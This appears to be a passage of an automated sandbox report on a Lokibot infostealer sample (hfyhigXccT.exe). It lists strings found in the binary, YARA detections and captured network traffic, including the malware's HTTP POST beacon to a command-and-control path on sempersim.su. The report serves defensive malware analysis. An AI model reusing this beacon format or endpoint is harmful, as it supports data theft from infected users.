Source: hfyhigXccT.exe, 00000000.00000003.251224303.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251819251.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.253424374.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251109332.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254256494.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251803357.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254662852.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252067592.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254588808.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250764720.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251698910.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254981466.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251899560.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252697276.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250696385.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251587341.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.254920230.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251361011.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.251927308.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.252012786.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, hfyhigXccT.exe, 00000000.00000003.250643837.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.come
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: hfyhigXccT.exe, 00000000.00000002.282435363.0000000007192000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown | HTTP traffic detected: POST /gh20/fre.php HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: sempersim.su | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: 306A36E8 | Content-Length: 190 | Connection: close
Source: unknown | DNS traffic detected: queries for: sempersim.su

              System Summary

Source: 0.2.hfyhigXccT.exe.4395410.11.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 0.2.hfyhigXccT.exe.4395410.11.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.hfyhigXccT.exe.437b3f0.10.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 0.2.hfyhigXccT.exe.437b3f0.10.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
Source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki Payload | Author: kevoreilly
Source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Lokibot in memory | Author: JPCERT/CC Incident Response Group
Source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers | Author: ditekSHen
              Source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: hfyhigXccT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 0.2.hfyhigXccT.exe.4395410.11.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.4395410.11.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.4395410.11.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
